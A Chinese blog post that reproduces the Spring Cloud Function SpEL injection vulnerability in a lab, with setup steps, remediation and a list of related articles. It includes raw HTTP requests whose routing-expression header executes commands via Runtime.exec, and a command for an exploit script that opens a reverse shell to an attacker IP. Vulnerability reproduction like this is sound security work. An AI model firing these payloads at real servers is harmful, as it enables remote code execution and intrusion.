Spring Cloud Function SpEL 漏洞复现

最新推荐文章于 2024-04-30 17:28:01 发布
最新推荐文章于 2024-04-30 17:28:01 发布
阅读量140 收藏
点赞数
分类专栏: java 文章标签: java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67393827/article/details/124348746
版权

目录

漏洞描述

Spring Cloud Function SpEL表达式注入漏洞,远程攻击者在无需认证的情况下,构造特定的数据包,在header中添加"spring.cloud.function.routing-expression"参数并携带SpEL表达式,成功利用此漏洞可实现任意代码执行。

影响版本

3.0.0.M3 <= Spring Cloud Function <=3.2.2

漏洞复现

漏洞环境

jdk-15.02
win10或linux(centos7,ubuntu 20.4)
SpringCloud-Function-0.0.1-SNAPSHOT.jar
poc&exp

怕链接失效以上环境均备好放在百度网盘。
链接: Spring Cloud 复现环境
提取码:1234

也可自行下载

jdk15下载地址:
https://www.oracle.com/java/technologies/javase/jdk15-archive-downloads.html

SpringCloud-Function.jar环境下载:
https://github.com/N1ce759/Spring-Cloud-Function-SPEL-RCE

POC&EXP下载地址:
https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE

1、下载一个jdk-15.02的版本,这里可以选择下载Linux x64或Windows x64,下载安装。

在这里插入图片描述在这里插入图片描述
2、启动 SpringCloud 环境,访问9000端口。

java -jar SpringCloud-Function-0.0.1-SNAPSHOT.jar

在这里插入图片描述
在这里插入图片描述

命令执行

1、burp中手动检测。

POST /xxx HTTP/1.1
Host: 192.168.1.133:9000
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("C:/Windows/System32/cmd.exe /c calc ")
Content-Type: application/x-www-form-urlencoded
Content-Length: 3

xxx

在这里插入图片描述

POST /functionRouter HTTP/1.1
Host: 192.168.1.133:9000
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("C:/Windows/System32/cmd.exe /c calc ")
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
 
rce

在这里插入图片描述

2、poc&exp批量检测。
这里我就直接贴图了,因为我复现环境是win10虚拟机没有测试反弹shell了,exp可以自行测试反弹shell。
在这里插入图片描述

python Spel_RCE_POC.py url.txt    //poc检测
python Spel_RCE_Bash_EXP.py http://192.168.1.133:9000/ 192.168.1.122 1234    //exp反弹shell

在这里插入图片描述

漏洞修复

目前,Spring Cloud Function官方已针对此漏洞进行修复,但还没有发布正式版本。
建议等待官方发布修复版本或自行下载修复代码进行手动编译。

修复版本地址:
https://github.com/spring-cloud/spring-cloud-function/tree/0e89ee27b2e76138c16bcba6f4bca906c4f3744f

排查方法:
如果程序使用Maven打包,可以通过排查项目的pom.xml文件中是否引入spring-cloud-function相关依赖,确认其版本是否在受影响范围内。

参考:
奇安信 CERT
明联安全

喵喵喵更多
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Spring Cloud Function SPEL表达式注入漏洞(CVE-2022-22963)
chaojixiaojingang
04-06 7485
1.漏洞描述 SpringCloudFunctionSpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头 spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。 2.影响版本 Spring Cloud Function 3.0.0 <...
Spring Cloud Function SPEL表达式注入漏洞复现
xhwfa的博客
04-20 3487
漏洞编号:CVE-2022-22963 一、漏洞简述 Spring Cloud Function 是基于Spring Boot的函数计算框架(FaaS),该项目提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像Amazon AWS Lambda 这样的 FaaS(函数即服务,function as a service)平台。它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 在版本3.0.0到当前最新版本3.2.2(commit dc5128b),默
Spring Cloud Function SpEL 表达式命令注入漏洞复现及利用
Tauil的博客
07-26 888
在源码中可以看到,未修改前的代码中spring.cloud.function.routing-expression参数被functionFromExpression接口中的getValue进行处理,该方法使用了StandardEvaluationContext来进行解析SeEL表达式,从而形成了注入漏洞。时,会触发RoutingFunction逻辑,在SpringCloudFunction中,RoutingFunction类的apply方法会将请求头中的。另启一个终端,再终端中输入。...
Spring cloud function SpEL RCE批量检测脚本,反弹shell脚本
03-30
Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 批量检测脚本:python Spel_RCE_POC.py url.txt 反弹...
SPRING CLOUD FUNCTION SPEL表达式注入漏洞测试服务端程序
03-30
用于Spring Cloud Function SPEL表达式注入漏洞测试环境搭建,是编译好的服务端程序,命令号java -jar *.jar运行即可,服务端运行在127.0.0.1:8080端口
SpringCloud Function SpEL注入漏洞分析(CVE-2022-22963).doc
07-08
SpringCloud Function SpEL注入漏洞分析(CVE-2022-22963).doc
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
12-26
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
Spring表达式语言SpEL用法详解
08-25
主要介绍了spring表达式语言SpEL用法详解,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
openfaas-spring-cloud-function:Spring Cloud功能的OpenFaas模板
03-28
用于Spring Cloud功能的OpenFaas模板 这是一个OpenFaas模板,它提供以下环境: 弹簧扣功能 webflux 杰克11 用功能编写您的业务逻辑,即仅提供RequestHandler的实现。 通过DI,实现从REST类传递到功能。 因此,只需代码,函数-RequestHandler,不必担心docker,k8s等。
Spring Cloud Function SPEL表达式注入漏洞
Blue的博客
04-12 459
漏洞概述 该漏洞是由于Spring Cloud Function中RoutingFunction类的 apply方法将请求头中spring.cloud.function.routing-expression传入的参数值作为SPEL表 达式进行处理,攻击者可以通过构造恶意的语句来实现SPEL表达式注入漏洞。 影响版本 3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2 漏洞复现 1.环境搭建 利用编译好的环境进行本地复现下载地址: ht
PHP-FPM Fastcgi 未授权访问漏洞
weixin_30519071的博客
01-10 615
漏洞原理 Fastcgi Fastcgi是一个通信协议,和HTTP协议一样,都是进行数据交换的一个通道。HTTP协议是浏览器和服务器中间件进行数据交换的协议,浏览器将HTTP头和HTTP体用某个规则组装成数据包,以TCP的方式发送到服务器中间件,服务器中间件按照规则将数据包解码,并按要求拿到用户需要的数据,再以HTTP协议的规则打包返回给服务器。类比HTTP协议来说,fastcgi协议则是服务器中...
SpringCloud Function SpEL漏洞环境搭建+漏洞复现
Moyun_vackbot的博客
03-29 2749
Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),该项目提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像 Amazon AWS Lambda 这样的 FaaS(函数即服务,function as a service)平台。它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。
Spring Cloud Function Spel表达式注入漏洞分析
m0_67391120的博客
08-24 832
简单了解了一下FaaS的的函数交付模式,和之前研究的容器安全场景下的微服务架构非常的契合,以往的大多数环境主要通过虚拟机交付逐渐演变了成了VPS、容器、API到现在的函数即服务;找到对应方法的RoutingFunction.class的文件内容,定位到对应的第80行的代码出,可以发现该方法主要Message的内容已经被传递过来;相关的配置项目可以在pom.xml当中进行修改,从项目当中可以看到依赖的组件版本为3.2.2是存在漏洞的版本,即可直接启动项目,无需其他的修改;
java方法重写(重点讲),方法重载
weixin_46281068的博客
04-27 921
一、方法重载定义:一个类中,出现多个方法的名称相同,但是它们的形参列表是不同的,那么这些方法就称为方法重载了。注意:一个类中,只要一些方法的名称相同、形参列表不同,那么它们就是方法重载了,其它的都不管(如:修饰符,返回值类型是否一样都无所谓)。形参列表不同指的是:形参的个数、类型、顺序不同,不关心形参的名称。应用场景:开发中我们经常需要为处理一类业务,提供多种解决方案,此时用方法重载来设计是很专业的。
Day25-Java基础之常用类1
m0_46053885的博客
04-27 875
同时我们发现Math类中的方法都是静态的,因此在使用的时候我们可以直接通过类名去调用。对于计算机而言,其实是没有数据类型的概念的,都是0101010101,数据类型是编程语言自己规定的,所以在实际存储的时候,先把具体的数字变成二进制,每32个bit为一组,存储在数组中。比较内存地址值一般情况下是没有意义的,我们希望比较的是对象的属性,如果两个对象的属性相同,我们认为就是同一个对象;如果我们的数据是一个浮点类型的数据,有的时候计算机并不会将这个数据完全转换成一个二进制数据,而是将这个将其转换成一个无限的。
链表刷题集
最新发布
yajunjiao的专栏
04-30 276
本文主要列举了一些刷的题,不多,有那么几道,也建议各位去建立自己的刷题集。积少成多。
Lambda表达式特点
weixin_57763462的博客
04-24 791
**API 设计**:Lambda 表达式鼓励使用函数式接口的设计模式,这改变了 Java 库的设计,例如 `java.util.function` 包下的一系列函数式接口。- **函数式编程**:Lambda 表达式引入了函数式编程的理念,使得 Java 更接近于函数式编程语言,如 Scala 和 Clojure。- **并发编程**:Lambda 表达式与 Java 8 新增的 Stream API 结合使用,可以简化并发编程,特别是与集合的操作相关。
SpringBoot SpEL表达式注入漏洞-分析与复现
06-02
下面我将通过一个简单的漏洞复现来说明SpEL表达式注入漏洞的危害性。 1. 创建一个SpringBoot应用 首先,我们需要创建一个SpringBoot应用。可以使用Spring Initializr来快速创建一个基本的SpringBoot应用。 2. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值